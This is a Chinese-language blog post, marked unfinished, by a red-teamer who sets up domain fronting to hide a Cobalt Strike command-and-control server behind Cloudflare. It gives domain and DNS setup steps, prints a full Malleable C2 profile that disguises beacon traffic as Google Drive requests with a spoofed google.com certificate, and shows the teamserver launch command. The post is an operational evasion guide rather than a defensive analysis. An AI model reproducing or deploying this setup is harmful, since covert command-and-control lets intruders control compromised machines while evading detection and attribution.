C2隐藏-域前置


C2隐藏之域名前置(未完待续)

前言

在进行红队测试中,如果没对自己的C2服务器做一定的保护,在做命令控制时,在受害机器产生与C2服务器通信的网络连接,那么就很容易被溯源到真实ip,同时C2服务器也暴露了,也就很难进行下一步动作。

域前置

域前置(英语:Domain fronting),又译为域名幌子,是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。

域前置”技术是一种审查规避技术,主要用于隐蔽通信中的远程端点。“域前置”发生在应用层,主要适用了HTTPS协议进行通信,通信中的远程端点原本是被禁止的,通过使用“域前置”技术,让检测器误认为是一个其他的合法地址,进而绕过检测。核心思想是在不同的通信层使用了不一样的域名。在一个HTTPS请求中,通信外层使用了一个域名:DNS请求和TLS SNI (Server Name Indication);而在通信内层,则使用了另一个域名:HTTP Host Header,这个域名由于在HTTPS加密之下,所以对检测器而言是不可见的。

这里借用大佬的一张图
Z27VOB

域前置技术可以高信誉度的域名进行前置,例如Google、Microsoft等,这里我只是简单实践一下

准备

  1. C2域名
  2. Cloudflare账号一枚
  3. C2服务器

域名相关配置

  1. Godaddy购置一枚域名,并将NS服务器设置为Cloudflare的地址进行解析
    r8qJ1N

  2. Cloudflare设置对应的A记录
    Lb6rfC

  3. Cloudflare调整缓存配置
    关闭开发模式和缓存
    cBBrtH

  4. 配置C2.profile
    这里有大佬harmj0y整理的集合

    https://github.com/rsmudge/Malleable-C2-Profiles
    这里有个google profile参考

    #
    # Google Drive
    # 
    # Author: @bluscreenofjeff
    #
    

#set https cert info
https-certificate {
set CN “*.google.com”; #Common Name
set O “Google Inc”; #Organization Name
set C “US”; #Country
set L “Mountain View”; #Locality
set ST “California”; #State or Province
set validity “365”; #Number of days the cert is valid for
}

#default Beacon sleep duration and jitter
set sleeptime “60000”;
set jitter “20”;

#default useragent for HTTP comms
set useragent “Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko”;

#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle “8.8.4.4”;

#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep “0”;

#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns “235”;

http-get {

set uri "/viewerng/meta";

client {

    header "Accept" "text/html,application/xml;*/*;";
    header "Accept-Encoding" "gzip, deflate";
    header "Host" "drive.google.com";
    header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

    #session metadata
    metadata {
        base64url;
        netbios;
        base64url;
        parameter "id";
    }

    parameter "u" "0";
}

server {
    header "Content-Type" "application/json; charset=utf-8";
    header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
    header "Pragma" "no-cache";
    header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
    header "X-Content-Type-Options" "nosniff";
    header "X-Frame-Options" "SAMEORIGIN";
    header "X-XSS-Protection" "1; mode=block";
    header "Server" "GSE";
    header "Connection" "close";


    #Beacon's tasks
    output {
        print;
    }
}

}

http-post {

set uri "/viewersng/meta";
set verb "GET";

client {

    header "Accept" "text/html,application/xml;*/*;";
    header "Accept-Encoding" "gzip, deflate";
    header "Host" "drive.google.com";
    header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";


    output {
        base64url;
        netbios;
        base64url;
        parameter "id";
    }

    #session ID
    id {
        parameter "u";
    }
}

server {
    header "Content-Type" "application/json; charset=utf-8";
    header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
    header "Pragma" "no-cache";
    header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
    header "X-Content-Type-Options" "nosniff";
    header "X-Frame-Options" "SAMEORIGIN";
    header "X-XSS-Protection" "1; mode=block";
    header "Server" "GSE";
    header "Connection" "close";


    output {
        print;
    }
}

}

#change the stager server
http-stager {
server {
header “Content-Type” “application/json; charset=utf-8”;
header “Cache-Control” “no-cache, no-store, max-age=0, must-revalidate”;
header “Pragma” “no-cache”;
}
}

需要注意的将profile文件中所有的域名替换为C2域名
![Zms0j2](https://blog-1255850204.cos.ap-guangzhou.myqcloud.com/uPic/Zms0j2.png)


## C2配置

1. 将修改好的C2.profile上传到Cobalstrike的根目录,启动命令后加./C2.profile
如:

./teamserver C2ip Password ./C2.profile

```
2. Cobalstrike设置listener
C9O3LG

最终效果

d4Ekxd

A90GBG

隐藏成功


文章作者: 夜莺
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 夜莺 !
  目录